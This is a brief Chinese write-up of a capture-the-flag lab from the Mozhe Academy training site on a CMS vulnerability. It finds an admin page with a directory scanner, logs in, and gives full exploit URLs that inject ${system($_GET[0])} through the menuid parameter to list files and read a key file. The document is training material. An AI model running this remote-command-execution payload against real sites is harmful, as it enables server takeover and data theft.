墨者学院 - CMS系统漏洞分析溯源(第2题)

御剑扫描发现后台登录地址 admin.php

登录后台http://ip地址/admin.php

后台用户名密码自动补充

界面 > 模板管理 > 模板风格 >search >index.html

登入后台，直接URL上执行http://ip地址/index.php?0=ls&m=content&c=content&a=public_categorys&type=add&menuid=822;${system($_GET[0])}&pc_hash=vad6K3&from=block

 

可以查看到key的名称

执行
http://ip地址/index.php?0=cat%20key_XXXX.php&m=content&c=content&a=public_categorys&type=add&menuid=822;${system($_GET[0])}&pc_hash=vad6K3&from=block

 

查看网页源文件，可以查看到key的内容。